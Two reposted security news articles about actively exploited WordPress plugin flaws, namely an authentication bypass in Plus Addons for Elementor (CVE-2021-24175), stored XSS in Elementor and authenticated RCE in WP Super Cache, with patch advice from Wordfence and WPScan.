Cyberattackers Exploiting Critical WordPress Plugin Bug

[mood]

Cyberattackers Exploiting Critical WordPress Plugin Bug
 

 

The security hole in the Plus Addons for Elementor plugin was used in active zero-day attacks prior to a patch being issued.

 

The Plus Addons for Elementor plugin for WordPress has a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it’s being actively attacked in the wild.

 

The plugin, which has more than 30,000 active installations according to its developer, allows site owners to create various user-facing widgets for their websites, including user logins and registration forms that can be added to an Elementor page. Elementor is a site-building tool for WordPress.

 

The bug (CVE-2021-24175) is a privilege-escalation and authentication-bypass issue that exists in this registration form function of the Plus Addons for Elementor. It rates 9.8 on the CVSS vulnerability scale, making it critical in severity.

“Unfortunately, this functionality was improperly configured and allowed attackers to register as an administrative user, or to log in as an existing administrative user,” according to researchers at Wordfence, in a posting this week. They added that it arises from broken session management, but didn’t provide further technical details.

Exploited as a Zero-Day Bug

The bug was first reported to WPScan by Seravo, a web-hosting company, as a zero-day under active attack by cybercriminals.

“The plugin is being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin,” according to WPScan’s overview.

 

As for how cybercriminals are using the exploit in the wild, Wordfence noted that indicators of compromise point to attackers creating privileged accounts and then using them to further compromise the site.

“We believe that attackers are adding user accounts with usernames as the registered email address based on how the vulnerability creates user accounts, and in some cases installing a malicious plugin labeled ‘wpstaff,'” researchers said.

 

Worryingly, they added that the vulnerability can still be exploited even if there’s no active login or registration page that was created with the plugin, and even if registration and logins are suspended or disabled.

“This means that any site running this plugin is vulnerable to compromise,” according to the Wordfence posting.

How to Fix the Plus Addons for Elementor Security Vulnerability

The vulnerability was reported on Monday, and fully patched a day later. Site admins should upgrade to version 4.1.7 of The Plus Addons for Elementor to avoid compromise, and they should check for “any unexpected administrative users or plugins you did not install,” according to Wordfence. The Plus Addons for Elementor Lite does not contain the same vulnerability, the firm added.

“If you are using The Plus Addons for Elementor plugin, we strongly recommend that you deactivate and remove the plugin completely until this vulnerability is patched,” researchers said. “If the free version will suffice for your needs, you can switch to that version for the time being.”

WordPress Plugin Problems Persist

WordPress plugins continue to offer an attractive avenue of attack for cybercriminals.

 

In January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.

 

Also that month, a plugin called PopUp Builder, used by WordPress websites for building pop-up ads for newsletter subscriptions, was found to have a vulnerability could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.

 

And in February, an unpatched, stored cross-site scripting (XSS) security bug was found to potentially affect 50,000 Contact Form 7 Style plugin users.

 

 

Source: Cyberattackers Exploiting Critical WordPress Plugin Bug

[mood]

Flaws in Two Popular WordPress Plugins Affect Over 7 Million Websites

 

 

Researchers have disclosed vulnerabilities in multiple WordPress plugins that, if successfully exploited, could allow an attacker to run arbitrary code and take over a website in certain scenarios.

 

The flaws were uncovered in Elementor, a website builder plugin used on more than seven million sites, and WP Super Cache, a tool used to serve cached pages of a WordPress site.

 

According to Wordfence, which discovered the security weaknesses in Elementor, the bug concerns a set of stored cross-site scripting (XSS) vulnerabilities (CVSS score: 6.4), which occurs when a malicious script is injected directly into a vulnerable web application.

 

In this case, due to a lack of validation of the HTML tags on the server-side, a bad actor can exploit the issues to add executable JavaScript to a post or page via a crafted request.

"Since posts created by contributors are typically reviewed by editors or administrators before publishing, any JavaScript added to one of these posts would be executed in the reviewer's browser," Wordfence said in a technical write-up. "If an administrator reviewed a post containing malicious JavaScript, their authenticated session with high-level privileges could be used to create a new malicious administrator, or to add a backdoor to the site. An attack on this vulnerability could lead to site takeover."

 

Multiple HTML elements such as Heading, Column, Accordion, Icon Box, and Image Box were found vulnerable to the stored XSS attack, thereby making it possible for any user to access the Elementor editor and add an executable JavaScript.

 

Given that the flaws take advantage of the fact that dynamic data entered in a template could be leveraged to include malicious scripts intended to launch XSS attacks, such behavior can be thwarted by validating the input and escaping the output data so that the HTML tags passed as inputs are rendered harmless.

 

Separately, an authenticated remote code execution (RCE) vulnerability was discovered in WP Super Cache that could allow an adversary to upload and execute malicious code with the goal of gaining control of the site. The plugin is reported to be used on more than two million WordPress sites.

 

Following responsible disclosure on February 23, Elementor fixed the issues in version 3.1.4 released on March 8 by hardening "allowed options in the editor to enforce better security policies." Likewise, Automattic, the developer behind WP Super Cache, said it addressed the "authenticated RCE in the settings page" in version 1.7.2.

 

It's highly recommended that users of the plugins update to the latest versions to mitigate the risk associated with the flaws.

 

 

Source: Flaws in Two Popular WordPress Plugins Affect Over 7 Million Websites